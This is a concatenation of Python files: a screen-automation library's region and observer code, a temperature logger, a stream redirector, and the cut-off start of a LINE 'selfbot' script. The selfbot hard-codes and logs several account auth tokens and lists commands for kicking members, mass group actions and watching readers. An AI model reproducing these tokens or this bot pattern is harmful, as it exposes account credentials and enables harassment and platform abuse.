path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return best_match
def compare(self, image):
""" Compares the region to the specified image """
return exists(Pattern(image), 0)
def findText(self, text, timeout=None):
""" OCR function """
raise NotImplementedError()
def findAllText(self, text):
""" OCR function """
raise NotImplementedError()
# Event Handlers
def onAppear(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` appears in this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("APPEAR", pattern, handler)
def onVanish(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` disappears from this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("VANISH", pattern, handler)
def onChange(self, min_changed_pixels=None, handler=None):
""" Registers an event to call ``handler`` when at least ``min_changed_pixels``
change in this region.
(Default for min_changed_pixels is set in Settings.ObserveMinChangedPixels)
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
if isinstance(min_changed_pixels, int) and (callable(handler) or handler is None):
return self._observer.register_event(
"CHANGE",
pattern=(min_changed_pixels, self.getBitmap()),
handler=handler)
elif (callable(min_changed_pixels) or min_changed_pixels is None) and (callable(handler) or handler is None):
handler = min_changed_pixels or handler
return self._observer.register_event(
"CHANGE",
pattern=(Settings.ObserveMinChangedPixels, self.getBitmap()),
handler=handler)
else:
raise ValueError("Unsupported arguments for onChange method")
def isChanged(self, min_changed_pixels, screen_state):
""" Returns true if at least ``min_changed_pixels`` are different between
``screen_state`` and the current state.
"""
r = self.clipRegionToScreen()
current_state = r.getBitmap()
diff = numpy.subtract(current_state, screen_state)
return (numpy.count_nonzero(diff) >= min_changed_pixels)
def observe(self, seconds=None):
""" Begins the observer loop (synchronously).
Loops for ``seconds`` or until this region's stopObserver() method is called.
If ``seconds`` is None, the observer loop cycles until stopped. If this
method is called while the observer loop is already running, it returns False.
Returns True if the observer could be started, False otherwise.
"""
# Check if observer is already running
if self._observer.isRunning:
return False # Could not start
# Set timeout
if seconds is not None:
timeout = time.time() + seconds
else:
timeout = None
# Start observe loop
while (not self._observer.isStopped) and (seconds is None or time.time() < timeout):
# Check registered events
self._observer.check_events()
# Sleep for scan rate
time.sleep(1/self.getObserveScanRate())
return True
def getObserveScanRate(self):
""" Gets the number of times per second the observe loop should run """
return self._observeScanRate if self._observeScanRate is not None else Settings.ObserveScanRate
def setObserveScanRate(self, scan_rate):
""" Set the number of times per second the observe loop should run """
self._observeScanRate = scan_rate
def getRepeatWaitTime(self):
""" Gets the wait time before repeating a search """
return self._repeatWaitTime
def setRepeatWaitTime(self, wait_time):
""" Sets the wait time before repeating a search """
self._repeatWaitTime = wait_time
def observeInBackground(self, seconds=None):
""" As Region.observe(), but runs in a background process, allowing the rest
of your script to continue.
Note that the subprocess operates on *copies* of the usual objects, not the original
Region object itself for example. If your event handler needs to share data with your
main process, check out the documentation for the ``multiprocessing`` module to set up
shared memory.
"""
if self._observer.isRunning:
return False
self._observer_process = multiprocessing.Process(target=self.observe, args=(seconds,))
self._observer_process.start()
return True
def stopObserver(self):
""" Stops this region's observer loop.
If this is running in a subprocess, the subprocess will end automatically.
"""
self._observer.isStopped = True
self._observer.isRunning = False
def hasObserver(self):
""" Check whether at least one event is registered for this region.
The observer may or may not be running.
"""
return self._observer.has_events()
def isObserving(self):
""" Check whether an observer is running for this region """
return self._observer.isRunning
def hasEvents(self):
""" Check whether any events have been caught for this region """
return len(self._observer.caught_events) > 0
def getEvents(self):
""" Returns a list of all events that have occurred.
Empties the internal queue.
"""
caught_events = self._observer.caught_events
self._observer.caught_events = []
for event in caught_events:
self._observer.activate_event(event["name"])
return caught_events
def getEvent(self, name):
""" Returns the named event.
Removes it from the internal queue.
"""
to_return = None
for event in self._observer.caught_events:
if event["name"] == name:
to_return = event
break
if to_return:
self._observer.caught_events.remove(to_return)
self._observer.activate_event(to_return["name"])
return to_return
def setInactive(self, name):
""" The specified event is ignored until reactivated
or until the observer restarts.
"""
self._observer.inactivate_event(name)
def setActive(self, name):
""" Activates an inactive event type. """
self._observer.activate_event(name)
def _raiseImageMissing(self, pattern):
""" Builds an ImageMissing event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = ImageMissingEvent(self, pattern=pattern, event_type="MISSING")
if self._imageMissingHandler is not None:
self._imageMissingHandler(event)
response = (event._response or self._findFailedResponse)
#if response == "PROMPT": # Prompt not valid for ImageMissing error
# response = _findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def setImageMissingHandler(self, handler):
""" Set a handler to receive ImageMissing events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected ImageMissing handler to be a callable")
self._imageMissingHandler = handler
## FindFailed event handling ##
# Constants
ABORT = "ABORT"
SKIP = "SKIP"
PROMPT = "PROMPT"
RETRY = "RETRY"
def setFindFailedResponse(self, response):
""" Set the response to a FindFailed exception in this region.
Can be ABORT, SKIP, PROMPT, or RETRY. """
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
self._findFailedResponse = response
def setFindFailedHandler(self, handler):
""" Set a handler to receive FindFailed events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected FindFailed handler to be a callable")
self._findFailedHandler = handler
def getFindFailedResponse(self):
""" Returns the current default response to a FindFailed exception """
return self._findFailedResponse
def setThrowException(self, setting):
""" Defines whether an exception should be thrown for FindFailed operations.
``setting`` should be True or False. """
if setting:
self._throwException = True
self._findFailedResponse = "ABORT"
else:
self._throwException = False
self._findFailedResponse = "SKIP"
def getThrowException(self):
""" Returns True if an exception will be thrown for FindFailed operations,
False otherwise. """
return self._throwException
def _raiseFindFailed(self, pattern):
""" Builds a FindFailed event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = FindFailedEvent(self, pattern=pattern, event_type="FINDFAILED")
if self._findFailedHandler is not None:
self._findFailedHandler(event)
response = (event._response or self._findFailedResponse)
if response == "PROMPT":
response = _findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def _findFailedPrompt(self, pattern):
ret_value = tkmb.showerror(
title="Sikuli Prompt",
message="Could not find target '{}'. Abort, retry, or skip?".format(pattern),
type=tkmb.ABORTRETRYIGNORE)
value_map = {
"abort": "ABORT",
"retry": "RETRY",
"ignore": "SKIP"
}
return value_map[ret_value]
class Observer(object):
def __init__(self, region):
self._supported_events = ("APPEAR", "VANISH", "CHANGE")
self._region = region
self._events = {}
self.isStopped = False
self.isRunning = False
self.caught_events = []
def inactivate_event(self, name):
if name in self._events:
self._events[name].active = False
def activate_event(self, name):
if name in self._events:
self._events[name].active = True
def has_events(self):
return len(self._events) > 0
def register_event(self, event_type, pattern, handler):
""" When ``event_type`` is observed for ``pattern``, triggers ``handler``.
For "CHANGE" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and
the base screen state.
"""
if event_type not in self._supported_events:
raise ValueError("Unsupported event type {}".format(event_type))
if event_type != "CHANGE" and not isinstance(pattern, Pattern) and not isinstance(pattern, basestring):
raise ValueError("Expected pattern to be a Pattern or string")
if event_type == "CHANGE" and not (len(pattern)==2 and isinstance(pattern[0], int) and isinstance(pattern[1], numpy.ndarray)):
raise ValueError("For \"CHANGE\" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and the base screen state.")
# Create event object
event = {
"pattern": pattern,
"event_type": event_type,
"count": 0,
"handler": handler,
"name": uuid.uuid4(),
"active": True
}
self._events[event["name"]] = event
return event["name"]
def check_events(self):
for event_name in self._events.keys():
event = self._events[event_name]
if not event["active"]:
continue
event_type = event["event_type"]
pattern = event["pattern"]
handler = event["handler"]
if event_type == "APPEAR" and self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
appear_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(appear_event)
self.caught_events.append(appear_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
elif event_type == "VANISH" and not self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
vanish_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(vanish_event)
else:
self.caught_events.append(vanish_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
# For a CHANGE event, ``pattern`` is a tuple of
# (min_pixels_changed, original_region_state)
elif event_type == "CHANGE" and self._region.isChanged(*event["pattern"]):
# Call the handler with a new ObserveEvent object
change_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(change_event)
else:
self.caught_events.append(change_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
class ObserveEvent(object):
def __init__(self, region=None, count=0, pattern=None, match=None, event_type="GENERIC"):
self._valid_types = ["APPEAR", "VANISH", "CHANGE", "GENERIC", "FINDFAILED", "MISSING"]
self._type = event_type
self._region = region
self._pattern = pattern
self._match = match
self._count = count
def getType(self):
return self._type
def isAppear(self):
return (self._type == "APPEAR")
def isVanish(self):
return (self._type == "VANISH")
def isChange(self):
return (self._type == "CHANGE")
def isGeneric(self):
return (self._type == "GENERIC")
def isFindFailed(self):
return (self._type == "FINDFAILED")
def isMissing(self):
return (self._type == "MISSING")
def getRegion(self):
return self._region
def getPattern(self):
return self._pattern
def getImage(self):
valid_types = ["APPEAR", "VANISH", "FINDFAILED", "MISSING"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getImage is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._pattern is None:
raise ValueError("This event's pattern was not set!")
return cv2.imread(self._pattern.path)
def getMatch(self):
valid_types = ["APPEAR", "VANISH"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getMatch is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getChanges(self):
valid_types = ["CHANGE"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getChanges is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getCount(self):
return self._count
class FindFailedEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(response):
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class ImageMissingEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(response):
valid_responses = ("ABORT", "SKIP", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class Match(Region):
""" Extended Region object with additional data on click target, match score """
def __init__(self, score, target, rect):
super(Match, self).__init__(rect[0][0], rect[0][1], rect[1][0], rect[1][1])
self._score = float(score)
if not target or not isinstance(target, Location):
raise TypeError("Match expected target to be a Location object")
self._target = target
def getScore(self):
""" Returns confidence score of the match """
return self._score
def getTarget(self):
""" Returns the location of the match click target (center by default, but may be offset) """
return self.getCenter().offset(self._target.x, self._target.y)
def __repr__(self):
return "Match[{},{} {}x{}] score={:2f}, target={}".format(self.x, self.y, self.w, self.h, self._score, self._target.getTuple())
class Screen(Region):
""" Individual screen objects can be created for each monitor in a multi-monitor system.
Screens are indexed according to the system order. 0 is the primary monitor (display 1),
1 is the next monitor, etc.
Lackey also makes it possible to search all screens as a single "virtual screen," arranged
according to the system's settings. Screen(-1) returns this virtual screen. Note that the
larger your search region is, the slower your search will be, so it's best practice to adjust
your region to the particular area of the screen where you know your target will be.
Note that Sikuli is inconsistent in identifying screens. In Windows, Sikuli identifies the
first hardware monitor as Screen(0) rather than the actual primary monitor. However, on OS X
it follows the latter convention. We've opted to make Screen(0) the actual primary monitor
(wherever the Start Menu/System Menu Bar is) across the board.
"""
primaryScreen = 0
def __init__(self, screenId=None):
""" Defaults to the main screen. """
if not isinstance(screenId, int) or screenId < -1 or screenId >= len(PlatformManager.getScreenDetails()):
screenId = Screen.getPrimaryID()
self._screenId = screenId
x, y, w, h = self.getBounds()
self.lastScreenImage = None
super(Screen, self).__init__(x, y, w, h)
@classmethod
def getNumberScreens(cls):
""" Get the number of screens in a multi-monitor environment at the time the script is running """
return len(PlatformManager.getScreenDetails())
def getBounds(self):
""" Returns bounds of screen as (x, y, w, h) """
return PlatformManager.getScreenBounds(self._screenId)
def capture(self, *args): #x=None, y=None, w=None, h=None):
""" Captures the region as an image """
if len(args) == 0:
# Capture screen region
region = self
elif isinstance(args[0], Region):
# Capture specified region
region = args[0]
elif isinstance(args[0], tuple):
# Capture region defined by specified tuple
region = Region(*args[0])
elif isinstance(args[0], basestring):
# Interactive mode
raise NotImplementedError("Interactive capture mode not defined")
elif isinstance(args[0], int):
# Capture region defined by provided x,y,w,h
region = Region(*args)
self.lastScreenImage = region.getBitmap()
return self.lastScreenImage
captureForHighlight = capture
def selectRegion(self, text=""):
""" Not yet implemented """
raise NotImplementedError()
def doPrompt(self, message, obs):
""" Not yet implemented """
raise NotImplementedError()
def closePrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def resetPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def hasPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def userCapture(self, message=""):
""" Not yet implemented """
raise NotImplementedError()
def saveCapture(self, name, reg=None):
""" Not yet implemented """
raise NotImplementedError()
def getCurrentID(self):
""" Returns screen ID """
return self._screenId
getID = getCurrentID
@classmethod
def getPrimaryID(cls):
""" Returns primary screen ID """
return cls.primaryScreen
@classmethod
def getPrimaryScreen(cls):
""" Returns the primary screen """
return Screen(cls.primaryScreen)
@classmethod
def showMonitors(cls):
""" Prints debug information about currently detected screens """
Debug.info("*** monitor configuration [ {} Screen(s)] ***".format(cls.getNumberScreens()))
Debug.info("*** Primary is Screen {}".format(cls.primaryScreen))
for index, screen in enumerate(PlatformManager.getScreenDetails()):
Debug.info("Screen {}: ({}, {}, {}, {})".format(index, *screen["rect"]))
Debug.info("*** end monitor configuration ***")
def resetMonitors(self):
""" Recalculates screen based on changed monitor setup """
Debug.error("*** BE AWARE: experimental - might not work ***")
Debug.error("Re-evaluation of the monitor setup has been requested")
Debug.error("... Current Region/Screen objects might not be valid any longer")
Debug.error("... Use existing Region/Screen objects only if you know what you are doing!")
self.__init__(self._screenId)
self.showMonitors()
def newRegion(self, loc, width, height):
""" Creates a new region on the current screen at the specified offset with the specified
width and height. """
return Region.create(self.getTopLeft().offset(loc), width, height)
def getLastScreenImageFromScreen(self):
""" Returns the last captured image from this screen """
return self.lastScreenImage
def newLocation(self, loc):
""" Creates a new location on this screen, with the same offset it would have had on the
default screen """
return Location(loc).copyTo(self)
def showTarget(self):
""" Not yet implemented """
raise NotImplementedError() |
hot_pi_d.py | import sqlite3
import threading
import time
class TemperatureRecorder:
thread_stop_event = threading.Event()
last_temp = 0
last_commit_time = time.time()
def start(self):
threading.Thread(target=self.record, args=(self.thread_stop_event,)).start()
def stop(self):
self.thread_stop_event.set()
def record(self, stop_event):
conn = sqlite3.connect("/opt/hotpi/temperatures.db")
while (not stop_event.is_set()):
self.last_temp = self.get_curr_temp()
conn.execute("INSERT INTO temperatures(temperature) VALUES(" + str(self.last_temp) + ")")
if time.time() - self.last_commit_time > 60:
conn.commit()
self.last_commit_time = time.time()
stop_event.wait(10)
conn.close()
def get_curr_temp(self):
with open("/sys/class/thermal/thermal_zone0/temp", "r") as f:
temp = int(f.read())
return temp
recorder = TemperatureRecorder()
recorder.start()
try:
while (True):
time.sleep(1)
except KeyboardInterrupt:
recorder.stop()
recorder.stop() |
redirect_streams.py | import os
import sys
import subprocess
import threading
from .mflog import decorate
# This script runs another process and captures stderr and stdout to a file, decorating
# lines with mflog metadata.
#
# Usage: redirect_streams SOURCE STDOUT_FILE STDERR_FILE PROGRAM ARG1 ARG2 ...
def reader_thread(SOURCE, dest_file, dest_stream, src):
with open(dest_file, mode="ab", buffering=0) as f:
if sys.version_info < (3, 0):
# Python 2
for line in iter(sys.stdin.readline, ""):
# https://bugs.python.org/issue3907
decorated = decorate(SOURCE, line)
f.write(decorated)
sys.stdout.write(line)
else:
# Python 3
for line in src:
decorated = decorate(SOURCE, line)
f.write(decorated)
dest_stream.buffer.write(line)
if __name__ == "__main__":
SOURCE = sys.argv[1].encode("utf-8")
stdout_dest = sys.argv[2]
stderr_dest = sys.argv[3]
p = subprocess.Popen(
sys.argv[4:],
env=os.environ,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout_reader = threading.Thread(
target=reader_thread, args=(SOURCE, stdout_dest, sys.stdout, p.stdout)
)
stdout_reader.start()
stderr_reader = threading.Thread(
target=reader_thread, args=(SOURCE, stderr_dest, sys.stderr, p.stderr)
)
stderr_reader.start()
rc = p.wait()
stdout_reader.join()
stderr_reader.join()
sys.exit(rc)
|
12.py | # -*- coding: utf-8 -*-
import LINEPY
from LINEPY import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
import youtube_dl
cl = LineClient(authToken='EpKRMvwu9eBKS3IK8ivc.sVCqTiIkfujwHVOznKXlla.ZUoCVYRNMm9czWD9RdSZA64LXi8qV+KBspTn6nIxyPE=')
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
ki = LineClient(authToken='EpVWlpYYD1pYL5yGEJI1.VZq819K+MTjFp7EJL7DGCq.TPURLoZWVJOYtDcPMBnVvCsoPc2NNnhxVQjq45TBQ14=')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
kk = LineClient(authToken='EpDU06Uy9J24U81UiGO4.fG185DzpN/oBUhOUTcrLfa.ZM9KnvNqWHs/HCfYDWDxTSGVM7e5vCCdl64RKRw9ZZE=')
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
kc = LineClient(authToken='EpBZ26TLJwUQ16hx8af5.JFqPWmGNQCrnZwiG3a94vq.dn3X8CYFlhwkNKYtGGPSIPcaa58J57gFu81UWgl8a5o=')
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
sw = LineClient(authToken='Epb3mJhX70IDASJeqcza.fdZ3mfXjEHiMPpSnvvUW/G.IUmH6xliKXmbV8xVBpsiWvfwcYkIKHuueGeRhVmT8Ps=')
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
poll = LinePoll(cl)
call = LineCall(cl)
creator = ["u02aea92a3d7e44f587e7a91141e78b59"]
owner = ["u02aea92a3d7e44f587e7a91141e78b59"]
admin = ["u4af710b4888a15425686fa19364c4b2c"]
staff = ["u4af710b4888a15425686fa19364c4b2c"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Zmid = sw.getProfile().mid
KAC = [cl,ki,kk,kc]
ABC = [ki,kk,kc]
Bots = [mid,Amid,Bmid,Cmid,Zmid]
Saints = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
welcome = []
responsename1 = ki.getProfile().displayName
responsename2 = kk.getProfile().displayName
responsename3 = kc.getProfile().displayName
settings = {
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":False,
"contact":False,
'autoJoin':False,
'autoAdd':True,
'autoCancel':{"on":True, "members":1},
'autoLeave':False,
'autoLeave1':False,
"detectMention":False,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"mention":"Masuk kk jan malu malu suee..😜",
"Respontag":"Jangan sering sering tag tq..😁 ",
"welcome":"Wellcome to my Fams",
"comment":"Auto like By CxB team",
"message":"Thanks add me🙏\n™CxB team™\n\nOpen Order:\n™↔ 1 Sb + 3 assist\n™↔ 1 Sb + 5 assist\n\nMinat?\nCpc bouuusss...",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"™↔ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n™↔ Group : "+str(len(gid))+"\n™↔ Teman : "+str(len(teman))+"\n™↔ Expired : In "+hari+"\n™↔ Version : Saints Bot\n™↔ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n™↔ Runtime : \n • "+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "™[ Selfbot Menu ]™\n Gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Me\n" + \
"™↔ " + key + "Mid「@」\n" + \
"™↔ " + key + "Info「@」\n" + \
"™↔ " + key + "Nk「@」\n" + \
"™↔ " + key + "Kick1「@」\n" + \
"™↔ " + key + "Mybot\n" + \
"™↔ " + key + "Status\n" + \
"™↔ " + key + "About\n" + \
"™↔ " + key + "Restart\n" + \
"™↔ " + key + "Runtime\n" + \
"™↔ " + key + "Creator\n" + \
"™↔ " + key + "Speed/Sp\n" + \
"™↔ " + key + "Sprespon\n" + \
"™↔ " + key + "Tagall\n" + \
"™↔ " + key + "Joinall\n" + \
"™↔ " + key + "Byeall\n" + \
"™↔ " + key + "Byeme\n" + \
"™↔ " + key + "Leave「Namagrup」\n" + \
"™↔ " + key + "Ginfo\n" + \
"™↔ " + key + "Open\n" + \
"™↔ " + key + "Close\n" + \
"™↔ " + key + "Url grup\n" + \
"™↔ " + key + "Gruplist\n" + \
"™↔ " + key + "Infogrup「angka」\n" + \
"™↔ " + key + "Infomem「angka」\n" + \
"™↔ " + key + "Remove chat\n" + \
"™↔ " + key + "Lurking「on/off」\n" + \
"™↔ " + key + "Lurkers\n" + \
"™↔ " + key + "Sider「on/off」\n" + \
"™ " + key + "Updatefoto\n" + \
"™↔ " + key + "Updategrup\n" + \
"™↔ " + key + "Updatebot\n" + \
"™↔ " + key + "Broadcast:「Text」\n" + \
"™↔ " + key + "Setkey「New Key」\n" + \
"™↔ " + key + "Mykey\n" + \
"™↔ " + key + "Resetkey\n" + \
